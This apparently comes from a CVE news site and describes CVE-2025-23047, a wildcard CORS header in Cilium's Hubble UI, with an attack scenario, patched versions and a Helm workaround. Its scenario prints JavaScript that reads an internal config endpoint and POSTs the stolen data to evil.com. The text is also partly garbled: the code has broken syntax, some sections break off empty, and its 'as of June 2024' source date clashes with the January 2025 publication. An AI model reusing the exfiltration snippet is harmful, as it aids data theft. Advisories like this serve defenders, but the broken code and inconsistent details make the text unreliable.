CVE CyberSecurity Database News

CVE-2025-23047 - Sensitive Data Exposure in Cilium Hubble UI via Insecure CORS Settings

Poster -

CVE-2025-23047 is a recently disclosed security vulnerability affecting Cilium, a widely-used networking, observability, and security solution for containerized environments like Kubernetes. The issue involves insecure defaults for the Access-Control-Allow-Origin HTTP header, used in Hubble UI—a web-based user interface bundled with Cilium. This misconfiguration potentially exposes sensitive cluster configuration data to remote attackers, due to a CORS (Cross-Origin Resource Sharing) policy that allows malicious sites to access data they shouldn’t.

This long read walks you through how the vulnerability works, which setups are affected, potential exploitation scenarios, and practical mitigation steps. We’ll cover everything in plain language, with code snippets and direct references, so that you can understand and protect your clusters.

The problem stems from a default CORS header set by Hubble UI. Specifically, the backend sets

Access-Control-Allow-Origin: *

This tells any browser to *allow cross-origin reading of responses* to any website, regardless of where the Javascript is running from.

What’s wrong with that?

If you run the Hubble UI and expose it (for example, on an internal company dashboard), and a user with access to that dashboard visits a malicious web page, that evil page could run Javascript to fetch API endpoints from your Hubble UI—stealing sensitive configuration details.

Node IP addresses

- Pod/service metadata

Exploit Scenario

Let’s walk through a plausible attack, step by step.

1. Employee logs in to Hubble UI

Your developer, Alice, is logged in to your Kubernetes UI, using Cilium’s Hubble UI.

2. Alice gets phished

She clicks a link in a malicious email, landing on an attacker's website.

3. Attack page issues requests to her Hubble UI

Once Alice visits the malicious page, the attacker uses Javascript running in Alice’s browser to make CORS requests to your internal Hubble UI endpoint.

Example JavaScript run by the attacker's site

// The attacker's JS running in Alice's browser
fetch("https://hubble-ui.corp.internal/api/config";)
  .then(resp => resp.json())
  .then(data => {
      // Send stolen data to attacker's server
      fetch("https://evil.com/stolen";, {
          method: "POST",
          body: JSON.stringify(data)
      });
  });

Because the backend sets Access-Control-Allow-Origin: *, the browser allows the request, and the attack page gets full configuration details. Now, the attacker has internal Kubernetes cluster data—no authentication popup, no warning.

How Bad Is It?

- Data exfiltration: Attackers can map your infrastructure by pulling node names, IPs, and workloads.

Recon: Prepares ground for further attacks, privilege escalation, or lateral movement.

- No authentication bypass: This doesn’t allow *remote access* directly—rather, it abuses an already logged-in user’s browser (a classic Cross Site Leaks/CORS attack).

Checking If You’re Vulnerable

1. Check your Cilium/Hubble UI version:

Fix: Update Cilium

The safest approach is to upgrade to one of these patched Cilium versions:

Official Changelog

- Cilium v1.14.18 Release
- Cilium v1.15.12 Release
- Cilium v1.16.5 Release

Workaround: Patch the Helm Chart

If you can’t upgrade right now, patch out the CORS header from the Hubble UI by editing the Helm template. This stops Access-Control-Allow-Origin: * from being set.

Sample patch (from commit a3489f190ba6e87b5336ee685fb6c80b127d06d):

# Search hubble-ui templates for something like:
headers:
  - name: Access-Control-Allow-Origin
    value: '*'

# Simply remove (or comment out) these lines. Then reinstall or upgrade.

References

- CVE Record: CVE-2025-23047 (MITRE) *(will be updated when available)*
- GitHub Security Advisory for Cilium
- Cilium Commit fixing the issue

Conclusion

CVE-2025-23047 highlights how a simple misconfiguration like a permissive CORS header can have serious security impacts in today’s cloud-native world. If you use Cilium and Hubble UI, check your deployment, update as soon as possible, or patch your Helm charts. Don’t wait—the fix is out and takes minutes to implement.

Stay alert, and secure your clusters!

*This long read is based exclusively on publicly disclosed data as of June 2024. Please refer to official advisories for the latest updates.*

Timeline

Published on: 01/22/2025 18:15:21 UTC